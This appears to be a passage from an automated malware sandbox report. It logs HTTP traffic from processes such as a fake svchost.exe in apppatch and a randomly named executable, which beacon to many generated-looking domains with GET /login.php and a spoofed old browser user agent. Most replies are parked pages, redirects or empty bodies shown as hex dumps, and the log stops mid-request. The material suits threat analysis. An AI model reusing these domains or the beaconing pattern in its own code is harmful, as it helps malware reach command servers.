                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:58 GMT
                                                                                                                                                                                                                  server: Apache
                                                                                                                                                                                                                  location: http://ww16.vofycot.com/login.php?sub1=20241112-0450-5851-9938-0bdfa7f33a56
                                                                                                                                                                                                                  content-length: 2
                                                                                                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                  connection: close
                                                                                                                                                                                                                  Data Raw: 0a 0a
                                                                                                                                                                                                                  Data Ascii:


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  44192.168.2.65472964.190.63.136801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.877432108 CET348OUTGET /login.php?sub1=20241112-0450-5851-9938-0bdfa7f33a56 HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: ww16.vofycot.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: __tad=1731347439.2338786
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.519500971 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:59 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                  transfer-encoding: chunked
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                  pragma: no-cache
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_2EcsfEHphYAq2SyCNUwqRKkIKLHg5prEnR1flzigjCDG+d1Dlm8tRlTPKkk5I4YSi6F4MaKhATkoCwBOfqG5aw==
                                                                                                                                                                                                                  last-modified: Mon, 11 Nov 2024 17:50:59 GMT
                                                                                                                                                                                                                  x-cache-miss-from: parking-7596689c44-6sm9t
                                                                                                                                                                                                                  server: Parking/1.0
                                                                                                                                                                                                                  Data Raw: 38 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 32 45 63 73 66 45 48 70 68 59 41 71 32 53 79 43 4e 55 77 71 52 4b 6b 49 4b 4c 48 67 35 70 72 45 6e 52 31 66 6c 7a 69 67 6a 43 44 47 2b 64 31 44 6c 6d 38 74 52 6c 54 50 4b 6b 6b 35 49 34 59 53 69 36 46 34 4d 61 4b 68 41 54 6b 6f 43 77 42 4f 66 71 47 35 61 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: 858<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_2EcsfEHphYAq2SyCNUwqRKkIKLHg5prEnR1flzigjCDG+d1Dlm8tRlTPKkk5I4YSi6F4MaKhATkoCwBOfqG5aw==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.519627094 CET1236INData Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d
                                                                                                                                                                                                                  Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.519639969 CET1236INData Raw: 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f
                                                                                                                                                                                                                  Data Ascii: ine-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}butt
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520042896 CET1236INData Raw: 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70
                                                                                                                                                                                                                  Data Ascii: tton;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.anno
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520056963 CET1236INData Raw: 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73
                                                                                                                                                                                                                  Data Ascii: a{font-size:10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520466089 CET1236INData Raw: 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e
                                                                                                                                                                                                                  Data Ascii: gin-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520478964 CET1236INData Raw: 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75
                                                                                                                                                                                                                  Data Ascii: ackground-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#ff
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.520489931 CET1236INData Raw: 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32
                                                                                                                                                                                                                  Data Ascii: transform:translateX(26px);transform:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.521085978 CET1236INData Raw: 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72
                                                                                                                                                                                                                  Data Ascii: ;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-he
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.521099091 CET1236INData Raw: 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 66 64 38 30
                                                                                                                                                                                                                  Data Ascii: ne}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.531991959 CET1236INData Raw: 34 59 53 69 36 46 34 4d 61 4b 68 41 54 6b 6f 43 77 42 4f 66 71 47 35 61 77 3d 3d 22 2c 22 74 69 64 22 3a 22 33 30 39 37 22 2c 22 62 75 79 62 6f 78 22 3a 74 72 75 65 2c 22 62 75 79 62 6f 78 54 6f 70 69 63 22 3a 74 72 75 65 2c 22 64 69 73 63 6c 61
                                                                                                                                                                                                                  Data Ascii: 4YSi6F4MaKhATkoCwBOfqG5aw==","tid":"3097","buybox":true,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":false,"slsh":false,"ppsh":true,"dnhlsh":true,"toSellUrl":"https://sedo.com/search/details/?partnerid=14460


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  45192.168.2.654730199.59.243.227801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.888362885 CET404OUTGET /login.php?subid1=20241112-0450-586c-82c6-824410e64c84 HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: ww25.lyxynyx.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: __tad=1731347439.3564880; parking_session=b097eaca-ea1a-4a8d-8bee-a2968c7eba7b
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.314130068 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:50:58 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                  content-length: 1230
                                                                                                                                                                                                                  x-request-id: 961815cc-8c8d-41a4-b210-66bae6edcecb
                                                                                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_gxX4uwSvW7ewWmeXquExbzweJwJXh6Dt0wdaPig23rcdoLc2tYdGy8xZNu9R4HNw0iexKGT3ftFy2kzvnVUpYw==
                                                                                                                                                                                                                  set-cookie: parking_session=b097eaca-ea1a-4a8d-8bee-a2968c7eba7b; expires=Mon, 11 Nov 2024 18:05:59 GMT
                                                                                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 67 78 58 34 75 77 53 76 57 37 65 77 57 6d 65 58 71 75 45 78 62 7a 77 65 4a 77 4a 58 68 36 44 74 30 77 64 61 50 69 67 32 33 72 63 64 6f 4c 63 32 74 59 64 47 79 38 78 5a 4e 75 39 52 34 48 4e 77 30 69 65 78 4b 47 54 33 66 74 46 79 32 6b 7a 76 6e 56 55 70 59 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_gxX4uwSvW7ewWmeXquExbzweJwJXh6Dt0wdaPig23rcdoLc2tYdGy8xZNu9R4HNw0iexKGT3ftFy2kzvnVUpYw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.314394951 CET656INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                                  Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjA5N2VhY2EtZWExYS00YThkLThiZWUtYTI5NjhjN2ViYTdiIiwicGFnZV90aW1lIjoxNzMxMzQ3NDU5LCJwYWdlX3VybCI6Imh0dHA6L


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  46192.168.2.65376472.52.179.174801112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.220251083 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyhub.com


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  47192.168.2.65376672.52.179.17480
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.741349936 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyhub.com


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  48192.168.2.653772162.255.119.102806912C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.183851004 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyqah.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.686229944 CET303INHTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:02 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                                  X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                                  Server: namecheap-nginx
                                                                                                                                                                                                                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                  Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  49192.168.2.65377399.83.170.3806912C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.210110903 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: puzylyp.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.644588947 CET166INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Location: https://puzylyp.com/login.php
                                                                                                                                                                                                                  Server: Caddy
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:02 GMT
                                                                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  50192.168.2.65377444.221.84.105806912C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.229973078 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qetyfuv.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347428|1731347428|0|1|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.652961016 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:02 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347462|1731347428|17|2|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  51192.168.2.653777199.59.243.22780
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.431566000 CET305OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vojyqem.com
                                                                                                                                                                                                                  Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.851334095 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:51:02 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                  content-length: 1094
                                                                                                                                                                                                                  x-request-id: 11628aaa-9c01-4922-bd02-36f0e302c140
                                                                                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                                  set-cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723; expires=Mon, 11 Nov 2024 18:06:02 GMT
                                                                                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.851399899 CET520INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                                  Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWU4OTBhNzMtYWMzYi00MmQwLTgwNmYtMzk3MjVmYTRiNzIzIiwicGFnZV90aW1lIjoxNzMxMzQ3NDYyLCJwYWdlX3VybCI6Imh0dHA6L


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  52192.168.2.653776208.100.26.245806912C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.490645885 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
